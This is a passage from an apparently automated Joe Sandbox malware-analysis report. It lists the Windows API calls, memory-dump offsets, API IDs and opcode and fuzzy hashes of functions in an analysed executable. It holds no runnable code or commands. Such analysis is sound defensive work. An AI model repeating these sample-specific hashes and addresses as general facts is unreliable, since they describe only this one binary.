                                              • Opcode Fuzzy Hash: 05e0c9d692694b61eca64c79df6c87835b3731dcaa62c55c5b758ea245221b2b
                                              • Instruction Fuzzy Hash: 4431CF31604256AFDB218F65CC85BBA7BE9FF40320F1541A8F82487290EF39E850DB50
                                              Function 00BB552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetForegroundWindow.USER32 ref: 00BB553F
                                                • Part of subcall function 00B93B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00B93B4E
                                                • Part of subcall function 00B93B34: GetCurrentThreadId.KERNEL32 ref: 00B93B55
                                                • Part of subcall function 00B93B34: AttachThreadInput.USER32(00000000,?,00B955C0), ref: 00B93B5C
                                              • GetCaretPos.USER32(?), ref: 00BB5550
                                              • ClientToScreen.USER32(00000000,?), ref: 00BB558B
                                              • GetForegroundWindow.USER32 ref: 00BB5591
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                              • String ID:
                                              • API String ID: 2759813231-0
                                              • Opcode ID: 9974cfb5b0294985449973792dc9f7d26a8862e0ed570490655a9d1a96a0d8f5
                                              • Instruction ID: 746a80f1f5b2f8c4278db6311b116a11e74d4d85993971801bc3f4fcf0553c3d
                                              • Opcode Fuzzy Hash: 9974cfb5b0294985449973792dc9f7d26a8862e0ed570490655a9d1a96a0d8f5
                                              • Instruction Fuzzy Hash: FF312B72900108AFDB10EFA5D885DEFB7F9EF98304F1040AAE415E7201EB71AE048BA0
                                              Function 00BBCB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                              • GetCursorPos.USER32(?), ref: 00BBCB7A
                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B6BCEC,?,?,?,?,?), ref: 00BBCB8F
                                              • GetCursorPos.USER32(?), ref: 00BBCBDC
                                              • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B6BCEC,?,?,?), ref: 00BBCC16
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                              • String ID:
                                              • API String ID: 2864067406-0
                                              • Opcode ID: 393250657e46de1a9d5625cff550788f6ad7a519ed2a2c7b1bb0c5840aadbb1c
                                              • Instruction ID: eccad3317aead41f632cecb9cd0dbfb3ffa842fc60fb950dd469ce07e4a28e0a
                                              • Opcode Fuzzy Hash: 393250657e46de1a9d5625cff550788f6ad7a519ed2a2c7b1bb0c5840aadbb1c
                                              • Instruction Fuzzy Hash: C8317635600018AFCB25DF59C899EFE7FE9EB49310F0440A9F9099B261CB71AD50EBA0
                                              Function 00B50BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                              Download Yara Rule
                                              APIs
                                              • __setmode.LIBCMT ref: 00B50BE2
                                                • Part of subcall function 00B4402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B97E51,?,?,00000000), ref: 00B44041
                                                • Part of subcall function 00B4402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B97E51,?,?,00000000,?,?), ref: 00B44065
                                              • _fprintf.LIBCMT ref: 00B50C19
                                              • OutputDebugStringW.KERNEL32(?), ref: 00B8694C
                                                • Part of subcall function 00B54CCA: _flsall.LIBCMT ref: 00B54CE3
                                              • __setmode.LIBCMT ref: 00B50C4E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                              • String ID:
                                              • API String ID: 521402451-0
                                              • Opcode ID: 45a2570e9e10520be08e5a2dbe4907cc11dab1b7aeb38db703d57907dc30424b
                                              • Instruction ID: f995e9a82505a1d7d6795fc440610ccf10cedf61f7c4bb9095a6946ec65f03ff
                                              • Opcode Fuzzy Hash: 45a2570e9e10520be08e5a2dbe4907cc11dab1b7aeb38db703d57907dc30424b
                                              • Instruction Fuzzy Hash: A5113A319041046ECB09B7A4AC83BBE77EDDF46322F1401DAF504572C2DF215D9A97A1
                                              Function 00B89274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B88D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B88D3F
                                                • Part of subcall function 00B88D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B88D49
                                                • Part of subcall function 00B88D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B88D58
                                                • Part of subcall function 00B88D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B88D5F
                                                • Part of subcall function 00B88D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B88D75
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00B892C1
                                              • _memcmp.LIBCMT ref: 00B892E4
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00B8931A
                                              • HeapFree.KERNEL32(00000000), ref: 00B89321
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                              • String ID:
                                              • API String ID: 1592001646-0
                                              • Opcode ID: a81bdaef6df9c06448753718638112c853e4142b3318f54284a0f7cec020d017
                                              • Instruction ID: 7fd8c6de698ae00c80e51ebfb4b4e03c9a895014e4d3bc52e59faf3e4bb8f213
                                              • Opcode Fuzzy Hash: a81bdaef6df9c06448753718638112c853e4142b3318f54284a0f7cec020d017
                                              • Instruction Fuzzy Hash: 84212771E40109EBDF10EFA4C945BAEB7F8EF44301F194099E855AB2A0D771AA05CB90
                                              Function 00BA1E33 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BA1E6F
                                                • Part of subcall function 00BA1EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BA1F18
                                                • Part of subcall function 00BA1EF9: InternetCloseHandle.WININET(00000000), ref: 00BA1FB5
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Internet$CloseConnectHandleOpen
                                              • String ID:
                                              • API String ID: 1463438336-0
                                              • Opcode ID: 8223bbe539d14bdc906512cd2b2308c3f1dfe5ba768abd47d937ea608708aceb
                                              • Instruction ID: 706129dd53d7c5a6c4d46d5714da2ee64cdef48ab20e8c134a2e386edabf0b4c
                                              • Opcode Fuzzy Hash: 8223bbe539d14bdc906512cd2b2308c3f1dfe5ba768abd47d937ea608708aceb
                                              • Instruction Fuzzy Hash: AF21D135208605BFDB569F68CC00FBBB7EAFF89700F00495AFE0597650DB71A811ABA0
                                              Function 00BB634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EC), ref: 00BB63BD
                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BB63D7
                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00BB63E5
                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00BB63F3
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Window$Long$AttributesLayered
                                              • String ID:
                                              • API String ID: 2169480361-0
                                              • Opcode ID: 40e33a25fcddaa558e1772f356edbc85fc5f9ea6b0e44a067ef65b51789379a2
                                              • Instruction ID: da42dffb89802d6a1cb315e7a16f0bcc577da675d86d91d43f5fa446d19f7301
                                              • Opcode Fuzzy Hash: 40e33a25fcddaa558e1772f356edbc85fc5f9ea6b0e44a067ef65b51789379a2
                                              • Instruction Fuzzy Hash: 43112631300414AFD704AB28DC94FBA77D8EF45320F244158F916C72D1CBA5AC00CB94
                                              Function 00B8E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B8F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00B8E46F,?,?,?,00B8F262,00000000,000000EF,00000119,?,?), ref: 00B8F867
                                                • Part of subcall function 00B8F858: lstrcpyW.KERNEL32(00000000,?), ref: 00B8F88D
                                                • Part of subcall function 00B8F858: lstrcmpiW.KERNEL32(00000000,?,00B8E46F,?,?,?,00B8F262,00000000,000000EF,00000119,?,?), ref: 00B8F8BE
                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00B8F262,00000000,000000EF,00000119,?,?,00000000), ref: 00B8E488
                                              • lstrcpyW.KERNEL32(00000000,?), ref: 00B8E4AE
                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,00B8F262,00000000,000000EF,00000119,?,?,00000000), ref: 00B8E4E2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: lstrcmpilstrcpylstrlen
                                              • String ID: cdecl
                                              • API String ID: 4031866154-3896280584
                                              • Opcode ID: befe38174580299fb9735cd5c868585368537ce5beb51b26f58012cfd51067c6
                                              • Instruction ID: 025b08f60cfee948f53cd6301d1793c49e6b76858fb5f7dc2ecbc6023884a6f7
                                              • Opcode Fuzzy Hash: befe38174580299fb9735cd5c868585368537ce5beb51b26f58012cfd51067c6
                                              • Instruction Fuzzy Hash: 5311AC3A200345EBDB25AF24D845D7A77E8FF49350B4440AAF81ACB2A0EB31E940C791
                                              Function 00B65312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00B65331
                                                • Part of subcall function 00B5593C: __FF_MSGBANNER.LIBCMT ref: 00B55953
                                                • Part of subcall function 00B5593C: __NMSG_WRITE.LIBCMT ref: 00B5595A
                                                • Part of subcall function 00B5593C: RtlAllocateHeap.NTDLL(01930000,00000000,00000001,?,00000004,?,?,00B51003,?), ref: 00B5597F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: AllocateHeap_free
                                              • String ID:
                                              • API String ID: 614378929-0
                                              • Opcode ID: b6132c61866539664a298d59cf96fbd7b410edc745d8bba36d9077695cebd65a
                                              • Instruction ID: 648af428e47a4f73ba5878e56eeca076cca1904a0b83369e5d87979fc89a1a07
                                              • Opcode Fuzzy Hash: b6132c61866539664a298d59cf96fbd7b410edc745d8bba36d9077695cebd65a
                                              • Instruction Fuzzy Hash: D1112B32505E06EFCB303F70AC4175A37D49F54BE1F1045E9FC469B290DE7889508798
                                              Function 00B94365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00B94385
                                              • _memset.LIBCMT ref: 00B943A6
                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00B943F8
                                              • CloseHandle.KERNEL32(00000000), ref: 00B94401
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                              • String ID:
                                              • API String ID: 1157408455-0
                                              • Opcode ID: 9be71ca1f47fe638402f2646042d9334406e9be7bb36a9307b9b69fba18b27a1
                                              • Instruction ID: dfd712a99f7d6238b9b1ed6382852b25785849a629ebd56b19ad02758fc6ddca
                                              • Opcode Fuzzy Hash: 9be71ca1f47fe638402f2646042d9334406e9be7bb36a9307b9b69fba18b27a1
                                              • Instruction Fuzzy Hash: 12110171901328BAD7309765AC4DFEBBBBCDF45760F0045E6F904D7280D6704E4087A4
                                              Function 00BA6A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B4402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B97E51,?,?,00000000), ref: 00B44041
                                                • Part of subcall function 00B4402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B97E51,?,?,00000000,?,?), ref: 00B44065
                                              • gethostbyname.WSOCK32(?,?,?), ref: 00BA6A84
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00BA6A8F
                                              • _memmove.LIBCMT ref: 00BA6ABC
                                              • inet_ntoa.WSOCK32(?), ref: 00BA6AC7
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                              • String ID:
                                              • API String ID: 1504782959-0
                                              • Opcode ID: f382af6cc250ffd76cfed9369b36b28142974f9de6199411bb92a9e363f7cfc4
                                              • Instruction ID: 93be9e53d5a346714a56a46cad04f1b5d03b790526e036a3814190563791db36
                                              • Opcode Fuzzy Hash: f382af6cc250ffd76cfed9369b36b28142974f9de6199411bb92a9e363f7cfc4
                                              • Instruction Fuzzy Hash: 651142719001089FCB04FBA4DD86DAE77F8EF08310B1480A5F506A7262DF30AE14DBA1
                                              Function 00B896F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 00B89719
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B8972B
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B89741
                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00B8975C
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: d6c30da8b1173801694dc8a6b00cb3642bf75587ddd2efd3b4eb85e7e104c530
                                              • Instruction ID: a368c914e147f9539c33eba0795ab2692ec6bd8dfc371b387b399855c758305d
                                              • Opcode Fuzzy Hash: d6c30da8b1173801694dc8a6b00cb3642bf75587ddd2efd3b4eb85e7e104c530
                                              • Instruction Fuzzy Hash: ED114839900218FFEF11EF95C984EADBBB8FB48710F204091EA00B72A0DB716E10DB90
                                              Function 00B3166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B329E2: GetWindowLongW.USER32(?,000000EB), ref: 00B329F3
                                              • DefDlgProcW.USER32(?,00000020,?), ref: 00B316B4
                                              • GetClientRect.USER32(?,?), ref: 00B6B93C
                                              • GetCursorPos.USER32(?), ref: 00B6B946
                                              • ScreenToClient.USER32(?,?), ref: 00B6B951
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Client$CursorLongProcRectScreenWindow
                                              • String ID:
                                              • API String ID: 4127811313-0
                                              • Opcode ID: 13aa51ecba6fbbc1424307f4f74da9ba8207b223edbd2454fe37d114ebd4cbd3
                                              • Instruction ID: 4b57f47386ed1f81a1caf2cf56d0f14f87e4e7decca657c0deaba7cce21f9c5d
                                              • Opcode Fuzzy Hash: 13aa51ecba6fbbc1424307f4f74da9ba8207b223edbd2454fe37d114ebd4cbd3
                                              • Instruction Fuzzy Hash: F9112576A10119EBCB10EF98C886DFE77F8EB09300F240895F951E7150CB30BA51CBA1
                                              Function 00B32111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B3214F
                                              • GetStockObject.GDI32(00000011), ref: 00B32163
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B3216D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CreateMessageObjectSendStockWindow
                                              • String ID:
                                              • API String ID: 3970641297-0
                                              • Opcode ID: 440143224eba2558d60386d551c19a76ca5d6ab7fccdef07c21767186e687d8b
                                              • Instruction ID: 99c421dd7aea66718cda94dce9486f4f6092f26dc72f6d6bed9547d46f72ab80
                                              • Opcode Fuzzy Hash: 440143224eba2558d60386d551c19a76ca5d6ab7fccdef07c21767186e687d8b
                                              • Instruction Fuzzy Hash: A111AD72501A09BFDF025F94DD84EEBBBA9EF58394F140152FB1462110CB31DC60DBA0
                                              Function 00B91941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B904EC,?,00B9153F,?,00008000), ref: 00B9195E
                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00B904EC,?,00B9153F,?,00008000), ref: 00B91983
                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00B904EC,?,00B9153F,?,00008000), ref: 00B9198D
                                              • Sleep.KERNEL32(?,?,?,?,?,?,?,00B904EC,?,00B9153F,?,00008000), ref: 00B919C0
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CounterPerformanceQuerySleep
                                              • String ID:
                                              • API String ID: 2875609808-0
                                              • Opcode ID: 60e8e30b2d4e3138d7c7755f7dc8a63129495517f5f1f84d18fa191072dd50bc
                                              • Instruction ID: 802954fb299e9bb71bdc67747cfa0eea4fc588d3cec2a5655986187fa7936838
                                              • Opcode Fuzzy Hash: 60e8e30b2d4e3138d7c7755f7dc8a63129495517f5f1f84d18fa191072dd50bc
                                              • Instruction Fuzzy Hash: BB117C31C0061EDBCF00AFA9D998AEEFBB8FF09701F4544A5E980B6240CB3096519B91
                                              Function 00BBE1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00BBE1EA
                                              • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 00BBE201
                                              • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 00BBE216
                                              • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 00BBE234
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
